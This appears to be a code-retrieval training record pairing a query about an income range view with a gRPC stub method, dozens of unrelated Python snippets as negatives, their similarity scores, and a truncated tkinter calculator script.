\"n_jobs\" in params)\n ):\n self.is_fitted_ = False\n valid_params = self.get_params(deep=False)\n for k,v in params.items():\n if k not in valid_params:\n raise ValueError(\"Invalid parameter: \", k)\n setattr(self, k, v)\n return self", "def set_params(cls, param_dict):\n for param in param_dict:\n if param in cls.params:\n cls.params[param] = param_dict[param]\n else:\n raise AttributeError(\"Invalid parameter dictionary! Format: {'<param>': <value>}\")", "def _set_parameter(self):\n # Get parameter keys\n self.input_parameter = self.parameter_combobox.currentText()\n self.result_parameter = self.result_parameters[self.input_parameter]\n # Adjust axes labels\n self.ax.set_xlabel('{} steunpunt'.format(self.input_parameter))\n self.ax.set_ylabel('{} uitvoerlocatie'.format(self.input_parameter))\n # Set data\n self._set_data()", "def part(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)" ]
[ "0.8175829", "0.8170592", "0.8165186", "0.79629844", "0.78029823", "0.779995", "0.77458686", "0.7707225", "0.7664552", "0.7520573", "0.7518126", "0.7402048", "0.7351057", "0.7351057", "0.7351057", "0.7351057", "0.7351057", "0.73461854", "0.7336423", "0.73144144", "0.73106277", "0.7305156", "0.7300206", "0.72140133", "0.72101974", "0.71994156", "0.7185727", "0.7180954", "0.71445745", "0.712152", "0.7121462", "0.7114679", "0.7108335", "0.7088777", "0.7067507", "0.7064918", "0.70586973", "0.70278823", "0.69999003", "0.6968022", "0.69621027", "0.69621027", "0.69621027", "0.6945607", "0.6931908", "0.69262046", "0.69183475", "0.690955", "0.69062895", "0.68949413", "0.68939805", "0.68889517", "0.68630797", "0.68554103", "0.68494254", "0.68490183", "0.68422467", "0.68298745", "0.6829119", "0.6820275", "0.6808056", "0.68071645", "0.68029886", "0.6797695", "0.6788277", "0.6785003", "0.6774106", "0.6749564", "0.67452097", "0.6734379", "0.6733487", "0.6729103", "0.6725974", "0.6702557", "0.6701056", "0.6690934", "0.66880435", "0.66664255", "0.6666246", "0.6662569", "0.6643428", "0.664079", "0.6636136", "0.6619069", "0.6616763", "0.66076785", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.66020846", "0.65935385", "0.6550173", "0.6548335", "0.65411055", "0.65291655", "0.65221673", "0.64903665" ]
0.0
-1
Returns the requested income range view in full detail.
def GetIncomeRangeView(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getRange(self):\n return self.range", "def displayActiveRange(selforcls):\n vRange = selforcls.activeRange()\n try:\n vRange = (selforcls.toDisplay(min(vRange)),\n selforcls.toDisplay(max(vRange)))\n except AttributeError:\n pass # toDisplay() only in ParameterFloat\n return vRange", "def get_display_trange(self) -> float:\n return float(self.query(':timebase:range?'))", "def range (self):\n return self._range", "def range (self):\n return self._range", "def range(self):\n return self.range_array", "def _get_sight_range(self):\n raise NotImplementedError", "def range(self):\n \n return self._range", "def test_get_range(self):\n pass", "def get_featureRange(self):\n\n return self.featureRange", "def income_report_gen(start, end):\n payments = get_income(start, end)\n row_title = [\"Name\", \"Boat\", \"Rent Day\", \"Pay Day\", \"Amount\"]\n data = []\n for payment in payments:\n temp = []\n for title, value in payment.items():\n temp.append(str(value))\n data.append(temp)\n row_format = \"{:>15}\" * (len(row_title)+1)\n print(row_format.format(\"\", *row_title))\n total_income = 0\n for i in range(len(data)):\n print(row_format.format(i+1, *data[i]))\n total_income += int(data[i][4])\n print(row_format.format(\"SUM\", *([\"--------------\"] * 4), str(total_income)))", "def get_range(self):\n if self.battery_size == 40:\n range = 150\n elif self.battery_size == 65:\n range = 225\n print(f\"This car can go about {range} miles on a full charge.\")", "def range_(self):\n return self.bset.range_", "def show_total(request):\n user_id = request.user\n end_date = datetime.datetime.utcnow()\n start_date = end_date.replace(day=1,\n hour=datetime.time(0, 0, 0).hour,\n minute=datetime.time(0, 0, 0).minute,\n second=datetime.time(0, 0, 0).second)\n total = 0\n incomes_to_date = IncomeHistory.objects.filter(date__range=(start_date, end_date),\n income_id__owner_id=user_id)\n if not incomes_to_date:\n return HttpResponse(0, status=200)\n\n for income in incomes_to_date:\n if income.is_active:\n total = total + income.value\n return HttpResponse(total, status=200)", "def get_range(self):\r\n\t\tif self.battery_size == 70:\r\n\t\t\trange = 240\r\n\t\telif self.battery_size == 85:\r\n\t\t\trange = 270\r\n\t\t\t\r\n\t\tmessage = \"This car can go approx. \" + str(range)\r\n\t\tmessage += \" miles on a full charge.\"\r\n\t\tprint(message)", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f\"This car can go about {range} miles on a full charge\")", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f'This car can go about {range} miles on a full charge.')", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f\"This car can go to about {range} miles on a full charge.\")", "def getRange(self, p_int): # real signature unknown; restored from __doc__\n pass", "def search_geoloc_range_free_loc(request):\n\n template_var = {\n }\n\n return template_var", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n\n print(f\"This car can go about {range} miles on a full charge.\")", "def roi(self):\n return super().get_queryset().exclude(\n outcome__isnull=True\n ).all().aggregate(\n roi=Sum('profit') / Sum('size_matched')\n )['roi']", "def range(self):\n return self.timerange()", "def get_range(self):\n if self.battery_size == 75:\n range = 260\n elif self.battery_size == 100:\n range = 315\n \n print(f\"This car can go about {range} miles on a full charge.\")", "def range_table(self):\n raise NotImplementedError('Abstract method.')", "def get_gain_range(self, *args):\n return _uhd_swig.usrp_source_get_gain_range(self, *args)", "def test_data_with_range_view(self):\n\n self.create_model()\n self.create_machine()\n self.insert_data()\n\n date_literal = '%Y-%m-%d'\n start_date = dt.today()\n end_date = start_date + datetime.timedelta(days=1)\n\n self.create_user_account_and_login()\n query_url = self.range_url + '/' + self.data['mid'] + \\\n '/?s=' + dt.strftime(start_date, date_literal) + \\\n '&e=' + dt.strftime(end_date, date_literal)\n\n response = self.client.get(query_url)\n results = json.loads(response.content)\n\n self.assertEquals(len(results), 2)", "def _full_value_range(self):\n min_value, max_value = self._raw_data.data_range\n return max_value - min_value", "def __set_range_to_show(self) -> None:\n cantus_firmus_positions = [\n line_element.scale_element.position_in_semitones\n for line_element in self.cantus_firmus\n ]\n cantus_firmus_lower_bound = min(cantus_firmus_positions)\n cantus_firmus_upper_bound = max(cantus_firmus_positions)\n\n counterpoint_lower_bound = self.lowest_element.position_in_semitones\n counterpoint_upper_bound = self.highest_element.position_in_semitones\n\n self.lowest_row_to_show = min(\n cantus_firmus_lower_bound,\n counterpoint_lower_bound\n )\n self.highest_row_to_show = max(\n cantus_firmus_upper_bound,\n counterpoint_upper_bound\n )", "def get_income(start, end):\n\n payments = session.query(part2.Sailors.name, part2.Payments.bid, part2.Payments.day, part2.Payments.payDay, part2.Payments.amount).\\\n select_from(part2.Payments). \\\n join(part2.Sailors, part2.Sailors.id == part2.Payments.sid). \\\n filter(part2.Payments.day >= start). \\\n filter(part2.Payments.day <= end). \\\n all()\n results = []\n for payment in payments:\n results.append({\"name\": payment[0], \"boat\": payment[1], \"rent_day\": payment[2], \"pay_day\": payment[3], \"amount\": payment[4]})\n return results", "def incomeBar(self):\r\n return self._createTextProfile(self.income)", "def _ebit(self):\n return self.net_income + self.tax_expense + self.interest_expense", "def range_field(self):\n return self.db.range_field", "def get_range(self):\n return time_to_range(self.get_time())", "def getFeHRange(brand):\n return feh_range[brand]", "def get_range(self):\n if self.battery_size == 70:\n range = 240\n elif self.battery_size == 85:\n range = 270\n\n message = \"this car can go approximately \"+ str(range)\n message += \" miles on a full charge.\"\n print(message)", "def view(self) -> 'outputs.ViewDefinitionResponse':\n return pulumi.get(self, \"view\")", "def get_range(self):\n if self.battery_size == 70:\n range = 240\n elif self.battery_size == 85:\n range = 270\n \n message = \"This car can go approximately \" + str(range)\n message += \" miles on a full charge.\"\n print(message)", "def getDataRange(self):\n return self._dataRange", "async def getRanges(self, stock, sharesOut, company_name, index, session):\n # if stock got a dot change to dash\n if \".\" in stock:\n stock = stock.replace(\".\", \"-\")\n\n request = await session.request(\n method=\"GET\", url=API.format(stock, \"1604793600\", \"1605571200\")\n )\n dataJson = await request.json()\n try:\n startRange = dataJson[\"chart\"][\"result\"][0][\"meta\"][\"firstTradeDate\"]\n except:\n error = dataJson[\"chart\"][\"error\"][\"description\"]\n print(error)\n # self.df.drop(index=index, inplace=True)\n return\n\n endRange = dataJson[\"chart\"][\"result\"][0][\"meta\"][\"currentTradingPeriod\"][\n \"regular\"\n ][\"end\"]\n if startRange == None or endRange == None:\n print(\"range was not found\")\n return\n\n await self.getData(\n startRange, endRange, stock, sharesOut, company_name, session\n )", "def get_range_info(self):\n with open(self.range_path, 'r') as _file:\n for line in _file.readlines():\n list0 = line.strip().split('-')\n range_dict = {\n 'min': int(list0[0], 16),\n 'max': int(list0[1], 16),\n 'max_offset': int(list0[1], 16) - int(list0[0], 16),\n }\n self.ranges.append(range_dict)", "def ranges(self):\n return self._ranges", "def f_get_range(self, copy=True):\n raise NotImplementedError(\"Should have implemented this.\")", "def _calc_range(self) -> np.ndarray:\n if self._is_ct25k():\n range_resolution = 30\n n_gates = 256\n else:\n n_gates = int(self.metadata[\"number_of_gates\"])\n range_resolution = int(self.metadata[\"range_resolution\"])\n return np.arange(n_gates) * range_resolution + range_resolution / 2", "def get_range(self):\n if self.battery_size == 70:\n range = 240\n elif self.battery_size == 85:\n range = 270\n message = \"This car can go approximately \" + str(range)\n message += \" miles on a full charge.\"\n print(message)", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (disc_low, disc_high,))\n return [h[0] for h in pickup]", "def range(self):\n\n return time_stat(self, stat=\"range\")", "def _select_by_range(self, disc_low, disc_high):\n sqlstmt = \"SELECT h FROM %s WHERE d>=? and d<=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (-disc_high, -disc_low))\n return [h[0] for h in pickup]", "def GetTRange(self):\n ...", "def getAFeRange(brand):\n return afe_range[brand]", "def _range_expression(self):\n # using filter expression to define the time range of the query\n # In influx2, range query is in the format\n # range(start:2018-05-22T23:30:00Z, stop: 2018-05-23T00:00:00Z) or\n # range(start: -12h, stop: -15m)\n # with stop parameter being optional\n if self.filter is None:\n return u''\n exp = (self._sql_where_expression(self.filter)).replace('AND',',').split(',')\n return u'|> range({})'.format(u' , '.join([(i.replace('\"','').replace(\"'\",'')) for i in exp if \"start\" in i or \"stop\" in i]))", "def get_outage(self):\r\n try:\r\n assert self._db_connection, {\r\n STATUS_KEY: HTTP_500_INTERNAL_SERVER_ERROR,\r\n MESSAGE_KEY: DB_ERROR}\r\n\r\n if self.equipment == COKE_DRUM_VALUE and self.module == OUTAGE_VALUE:\r\n \"\"\"\r\n This will return the graph data for the selected outage module\r\n \"\"\"\r\n query_params = {\r\n TAG_NAME_REQUEST: self.query_params.GET[TAG_NAME_REQUEST],\r\n START_DATE_REQUEST: self.query_params.GET[START_DATE_REQUEST],\r\n END_DATE_REQUEST: self.query_params.GET[END_DATE_REQUEST]\r\n }\r\n MODULE_LEVEL_MULTILINE_TAG = tuple(LIST_OF_OUTAGE_MODULE_LEVEL_MULTILINE_TAGS_GRAPH)\r\n if MULTILINE_REQUEST in self.query_params.GET:\r\n \"\"\"\r\n This will return the graph data for the actual and predicted tags for the selected outage module \r\n \"\"\"\r\n query_params[MULTILINE_REQUEST] = self.query_params.GET[MULTILINE_REQUEST]\r\n\r\n if query_params:\r\n if START_DATE_REQUEST not in query_params or not query_params[START_DATE_REQUEST] and \\\r\n MULTILINE_REQUEST not in query_params:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_GRAPH_NULL_START_DATE.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n elif query_params[START_DATE_REQUEST] and MULTILINE_REQUEST not in query_params:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_GRAPH.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST],\r\n query_params[START_DATE_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n elif query_params[START_DATE_REQUEST] and query_params[MULTILINE_REQUEST]:\r\n if query_params[TAG_NAME_REQUEST] in LIST_OF_OUTAGE_MODULE_LEVEL_MULTILINE_TAGS_GRAPH:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_MODULE_MULTILINE_GRAPH.format(\r\n self.module,\r\n MODULE_LEVEL_MULTILINE_TAG,\r\n query_params[START_DATE_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n\r\n else:\r\n graph_data = django_search_query_all(\r\n DETAILED_OUTAGE_GRAPH.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST],\r\n query_params[START_DATE_REQUEST],\r\n query_params[END_DATE_REQUEST]))\r\n\r\n df_data = pd.DataFrame(graph_data)\r\n min_max = django_search_query_all(\r\n MIN_MAX_DATA.format(\r\n self.module,\r\n query_params[TAG_NAME_REQUEST]\r\n ))\r\n df_min_max_data = pd.DataFrame(min_max)\r\n graph = []\r\n\r\n if not df_data.empty:\r\n df_data = df_data.where(pd.notnull(df_data) == True, None)\r\n df_data.sort_values(TIMESTAMP_KEY, ascending=True, inplace=True)\r\n df_unit = df_data[UNIT].iloc[0]\r\n df_description = df_data[DESCRIPTION].iloc[0]\r\n df_timestamp = list(dict.fromkeys(list(df_data[TIMESTAMP_KEY])))\r\n\r\n if query_params[TAG_NAME_REQUEST] in LIST_OF_OUTAGE_MODULE_LEVEL_MULTILINE_TAGS_GRAPH:\r\n df_result = df_data.groupby(TAG_NAME_REQUEST)\r\n actual_north_data = []\r\n predicted_north_data = []\r\n actual_south_data = []\r\n predicted_south_data = []\r\n if len(df_result) == 2:\r\n df_description = \\\r\n df_data[df_data[TAG_NAME_REQUEST] == query_params[TAG_NAME_REQUEST]][\r\n DESCRIPTION].iloc[0]\r\n df_north_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_north_data = list(df_north_actual['north_drum_tag_value'])\r\n df_north_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_north_data = list(df_north_predicted['north_drum_tag_value'])\r\n df_south_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_south_data = list(df_south_actual['south_drum_tag_value'])\r\n df_south_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_south_data = list(df_south_predicted['south_drum_tag_value'])\r\n elif len(df_result) == 1:\r\n\r\n if df_result[TAG_NAME_REQUEST] == OUTAGE_MODULE_LEVEL_ACTUAL_TAG:\r\n df_description = \\\r\n df_data[df_data[TAG_NAME_REQUEST] == OUTAGE_MODULE_LEVEL_ACTUAL_TAG][\r\n DESCRIPTION].iloc[0]\r\n df_north_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_north_data = list(df_north_actual['north_drum_tag_value'])\r\n df_south_actual = df_result.get_group(OUTAGE_MODULE_LEVEL_ACTUAL_TAG)\r\n actual_south_data = list(df_south_actual['south_drum_tag_value'])\r\n\r\n elif df_result[TAG_NAME_REQUEST] != OUTAGE_MODULE_LEVEL_ACTUAL_TAG:\r\n df_description = \\\r\n df_data[df_data[TAG_NAME_REQUEST] == OUTAGE_MODULE_LEVEL_PREDICTED_TAG][\r\n DESCRIPTION].iloc[0]\r\n df_north_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_north_data = list(df_north_predicted['north_drum_tag_value'])\r\n df_south_predicted = df_result.get_group(OUTAGE_MODULE_LEVEL_PREDICTED_TAG)\r\n predicted_south_data = list(df_south_predicted['south_drum_tag_value'])\r\n\r\n temp = {\"north_actual\": actual_north_data, \"north_predicted\": predicted_north_data,\r\n \"south_actual\": actual_south_data, \"south_predicted\": predicted_south_data,\r\n \"x_axis\": df_timestamp,\r\n \"unit\": df_unit,\r\n \"description\": df_description}\r\n\r\n else:\r\n temp = {\"y_axis\": list(df_data[TAG_VALUE]), \"x_axis\": df_timestamp,\r\n \"unit\": df_unit, \"description\": df_description}\r\n if not df_min_max_data.empty:\r\n temp[\"min_data\"] = df_min_max_data[MIN_VALUE].iloc[0]\r\n temp[\"max_data\"] = df_min_max_data[MAX_VALUE].iloc[0]\r\n else:\r\n temp[\"min_data\"] = None\r\n temp[\"max_data\"] = None\r\n graph.append(temp)\r\n\r\n return graph\r\n\r\n except AssertionError as e:\r\n log_error(\"Exception due to : %s\" + str(e))\r\n return asert_res(e)\r\n except Exception as e:\r\n log_error(\"Exception due to : %s\" + str(e))\r\n return json_InternalServerError", "def __str__(self) -> str:\n\n return str(tstack([self._domain, self._range]))", "def __call__(self, start: int = 0, end: int = 5):\n pprint(self.data[start:end])", "def get_household_income_columns():\n return {\n 'COUNTY': 'County FIPS Code',\n 'GEOCAT': 'Summary Level',\n 'GEOID': 'State+County FIPS Code',\n 'SAEMHI_LB90': 'Median Household Income Lower Bound for 90% Confidence Interval',\n 'SAEMHI_MOE': 'Median Household Income Margin of Error',\n 'SAEMHI_PT': 'Median Household Income Estimate',\n 'SAEMHI_UB90': 'Median Household Income Upper Bound for 90% Confidence Interval',\n 'SAEPOVALL_LB90': 'All ages in Poverty, Count Lower Bound for 90% Confidence Interval',\n 'SAEPOVALL_MOE': 'All ages in Poverty, Count Margin of Error',\n 'SAEPOVALL_PT': 'All ages in Poverty, Count Estimate',\n 'SAEPOVALL_UB90': 'All ages in Poverty, Count Upper Bound for 90% Confidence Interval',\n 'SAEPOVRTALL_LB90': 'All ages in Poverty, Rate Lower Bound for 90% Confidence Interval',\n 'SAEPOVRTALL_MOE': 'All ages in Poverty, Rate Margin of Error',\n 'SAEPOVRTALL_PT': 'All ages in Poverty, Rate Estimate',\n 'SAEPOVRTALL_UB90': 'All ages in Poverty, Rate Upper Bound for 90% Confidence Interval',\n 'SAEPOVU_ALL': 'All Ages in Poverty Universe',\n 'STABREV': 'Two-letter State Postal abbreviation',\n 'STATE': 'FIPS State Code',\n 'YEAR': 'Estimate Year',\n }", "def test_get_meta_range(self):\n pass", "def get_genomic_range( self ):\n return self.snv_chrom + ':' + str( self.snv_start ) + '-' + str( self.snv_end )", "def fusion_api_get_vsn_range(self, uri=None, param='', api=None, headers=None):\n return self.vsnrange.get(uri=uri, api=api, headers=headers, param=param)", "def view_insurances(request):\n insurance = Insurance.objects.filter(medical_information=request.user.userprofile.medicalinformation)\n return render(request, 'view_insurances.html', {'insurances': insurance})", "def get_ip_range(self):\n return self._ip_range", "def inconclusive_detail(self) -> 'outputs.InconclusiveDetailResponse':\n return pulumi.get(self, \"inconclusive_detail\")", "def global_range(self):\n raise NotImplementedError", "def fusion_api_get_vmac_range(self, uri=None, param='', api=None, headers=None):\n return self.vmacrange.get(uri=uri, api=api, headers=headers, param=param)", "def get_gain_range(self, *args):\n return _uhd_swig.usrp_sink_get_gain_range(self, *args)", "def get_overview(entities=None):\n \n url = \"{ep}/views/overview\".format(ep=endpoint)\n \n if entities is not None:\n qs = {}\n for e in entities:\n qs.update({'entityId': e})\n \n r = requests.get(url, headers=headers, params=qs)\n else:\n r = requests.get(url, headers=headers)\n \n return r.json()", "def getRangeInches(self) -> float:\n ...", "def targetRange(self):\n return self._getAttribute(Attribute.targetRange)", "def rangeA(self):\r\n if self._range_A is not None:\r\n return round(self._range_A,2)\r\n else:\r\n return self._range_A", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def GetScalarRange(self):\n ...", "def index_as_range(self):\n return self.index().as_timerange() if self.index() else None", "def lrange(self, name, start, end):\r\n return self.format_inline('LRANGE', name, start, end)", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def open_range(start, stop, step):\n return np.arange(start, stop+step/2, step)", "def income(self, fromdt, todt):\r\n return self._buildTransDict(fromdt, todt, Income)", "def GetView(self):\r\n return self.model.GetView()", "def _get_view(self, cursor):\n raise NotImplementedError", "def get_display_price_data(self, source, commitment):\n overage, included = self.get_price_data(source, commitment)\n if self.name == settings.BILLING_DEFAULT_PLAN_NAME:\n included = OFFICIAL_BUILDER_LIMITS[source]\n return overage, included", "def get_frame_range(self):\n raise NotImplementedError(\"get_frame_range is not implemented\")", "def range(self) -> Tuple[Union[int, float], Union[int, float]]:\n return self._range", "def f_get_range(self, copy=True):\n if not self.f_has_range():\n raise TypeError(\n \"Your parameter `%s` is not array, so cannot return array.\"\n % self.v_full_name\n )\n elif copy:\n return self._explored_range[:]\n else:\n return self._explored_range", "def get_range(self):\n if self.battery_size == 75:\n car_range = 260\n elif self.battery_size == 100:\n car_range = 315\n \n print(f\"This car can run for {car_range} miles.\")", "def summarize_ranges(self, ranges):\n if len(ranges) == 0: return []\n min_ = 'min'\n max_ = 'max'\n for r in ranges:\n if r[0][0] == \"min\":\n r[0][0] = min_\n else:\n min_ = r[0][0]\n if r[-1][1] == \"max\":\n r[-1][1] = max_\n else:\n max_ = r[-1][1]\n return ranges[-1]", "def get_start_indef_range(start: int) -> models.IndefiniteRange:\n return models.IndefiniteRange(value=start - 1, comparator=\"<=\",\n type=\"IndefiniteRange\")", "def get_range_value(self, key):\n pass", "def suggested_retirement_income(self, request, parent_lookup_client, pk, format=None):\n # TODO: Make this work\n return Response(1234)", "def range(self) -> str:\n return f\"{self.name}!A:F\"", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def view(self, flow=False):\n return _to_view(self._hist.view(flow))", "def range(self):\n return self._upper - self._lower", "def get_gain_range(self, *args):\n return _uhd_swig.usrp_source_sptr_get_gain_range(self, *args)", "def get_income_fields():\n less_than_30k_fields = [\n 'B19001_002E', #\tLess than $10,000\t\n 'B19001_003E', #\t$10,000 to $14,999\t\n 'B19001_004E', #\t$15,000 to $19,999\t\n 'B19001_005E', #\t$20,000 to $24,999\t\n 'B19001_006E', #\t$25,000 to $29,999\t\n ]\n inc_30k_to_39k_fields = [\n 'B19001_007E', #\t$30,000 to $34,999\t\n 'B19001_008E', #\t$35,000 to $39,999\n ]\n inc_40k_to_49k_fields = [\n 'B19001_009E', #\t$40,000 to $44,999\t\n 'B19001_010E', #\t$45,000 to $49,999 \n ]\n inc_50k_to_74k_fields = [\n 'B19001_011E', #\t$50,000 to $59,999\t\n 'B19001_012E', #\t$60,000 to $74,999\n ]\n inc_75k_to_99k_fields = [\n 'B19001_013E' #\t$75,000 to $99,999\n ]\n inc_100k_to_149k_fields = [\n 'B19001_014E', #\t$100,000 to $124,999\t\n 'B19001_015E', #\t$125,000 to $149,999\t\n ]\n inc_150k_plus_fields = [\n 'B19001_016E', #\t$150,000 to $199,999\t\n 'B19001_017E', #\t$200,000 or more\n ]\n\n income_fields = OrderedDict()\n income_fields[ 'less_than_30k' ] = { 'label': '<$30,000', 'fields': less_than_30k_fields }\n income_fields[ 'inc_30k_to_39k' ] = { 'label': '$40,000 to $49,999', 'fields': inc_30k_to_39k_fields }\n income_fields[ 'inc_40k_to_49k' ] = { 'label': '$40,000 to $49,999', 'fields': inc_40k_to_49k_fields }\n income_fields[ 'inc_50k_to_74k' ] = { 'label': '$50,000 to $74,999', 'fields': inc_50k_to_74k_fields }\n income_fields[ 'inc_75k_to_99k' ] = { 'label': '$75,000 to $99,999', 'fields': inc_75k_to_99k_fields }\n income_fields[ 'inc_100k_to_149k' ] = { 'label': '$100,000 to $149,999', 'fields': inc_100k_to_149k_fields }\n income_fields[ 'inc_150k_plus' ] = { 'label': '$150,000+', 'fields': inc_150k_plus_fields }\n\n return income_fields", "def list(self, request, scope=None):\n\n qs = self.get_queryset()\n if scope == 'summary':\n total = qs.aggregate(total=Sum('total_value'))['total'] or 0.0\n return Response({'total_investment': total}, status=200)\n else:\n serializer = self.get_serializer(qs, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)", "def __json__(self, request=None):\n # start = self.start.isoformat() if self.start else None\n # end = self.end.isoformat() if self.end else None\n return dict(\n timeref_type=\"daterange\",\n interval=self.interval,\n start=self.start.isoformat(),\n end=self.end.isoformat(),\n )", "def _get_min_expense(self):\n pass", "def provider_range_lookup(self, record):\n pass" ]
[ "0.5824725", "0.5612662", "0.55873716", "0.54605365", "0.54605365", "0.5444421", "0.5324229", "0.5322225", "0.5300629", "0.5277442", "0.5269223", "0.5262803", "0.5230335", "0.52228105", "0.5218109", "0.51848346", "0.5179088", "0.51768607", "0.5176457", "0.51640767", "0.51595587", "0.5153438", "0.51508856", "0.5130879", "0.51223975", "0.5076467", "0.50653094", "0.5058624", "0.5058521", "0.50528425", "0.50424135", "0.5038926", "0.5022902", "0.49918702", "0.49810165", "0.49601832", "0.49539348", "0.49464768", "0.4941292", "0.4931997", "0.49276793", "0.4911075", "0.49029136", "0.49028605", "0.49028015", "0.49025145", "0.48853308", "0.4882531", "0.48816955", "0.4877526", "0.48731557", "0.4855839", "0.48545417", "0.48509085", "0.48460716", "0.48233867", "0.4821615", "0.48211873", "0.4817077", "0.48167542", "0.48139924", "0.48092324", "0.48059148", "0.47998434", "0.47839877", "0.4777155", "0.47654146", "0.47636932", "0.4756754", "0.4754899", "0.4754899", "0.4754899", "0.4754899", "0.4754322", "0.47519866", "0.47431228", "0.47428122", "0.4738438", "0.47277197", "0.47263256", "0.47258902", "0.4718425", "0.47149432", "0.47076297", "0.4704196", "0.4703901", "0.46999612", "0.46931824", "0.46891353", "0.46870142", "0.4676462", "0.46720225", "0.46676034", "0.46675956", "0.46622282", "0.46533865", "0.46516693", "0.4650772", "0.46506947", "0.46444535" ]
0.700728
0
This is just a big UI setup
def main(): #------------------------------------- Functions def add(text): """ This will add to the display, and be the go to function of most buttons. We'll want to add in conditions for what buttons go. """ orig = dispb["text"] new = orig + text ops = ["+","-","*","/"] # conditions # length 21 if len(new) > 21: dispb["text"] = orig return 0 # one calc at a time if len(orig) > 0: if (orig[-1] in ops) & (text in ops): dispb["text"] = orig return 0 dispb["text"] = new return 0 def clear(): dispb["text"] = "" return 0 def backspace(): dispb["text"] = dispb["text"][:len(dispb["text"])-1] return 0 def equals(): try: dispb["text"] = str(eval(dispb["text"])) except: dispb["text"]="ERROR, clear display" #------------------------------------- UI # title and start calc = tk.Tk() calc.title("Calculator") # size calc.geometry("255x235") #calc.columnconfigure(range(3), weight=1, minsize=50) #calc.rowconfigure(range(1,4), weight=1, minsize=48) # Icon calc.iconbitmap('Icon.ico')#'Icon.ico') calcarea = tk.Frame(master=calc) calcarea.pack(padx=5, pady=10) # display box disp = tk.Frame( master = calcarea ) disp.grid(row = 0, column = 0, columnspan = 3) dispb = tk.Label( master = disp, text = '', fg = 'black', bg = 'white', borderwidth = 1, relief = 'solid', height = 2, width = 19 ) dispb.pack() # number buttons num1 = tk.Frame( master=calcarea ) num1.grid(row = 3, column = 0) num1b = tk.Button( master = num1, text = 1, width = 5, height = 2, command = lambda: add("1") ).pack() # the pack is what adds it to the UI # two num2 = tk.Frame( master=calcarea ) num2.grid(row = 3, column = 1) num2b = tk.Button( master = num2, text = "2", width = 5, height = 2, 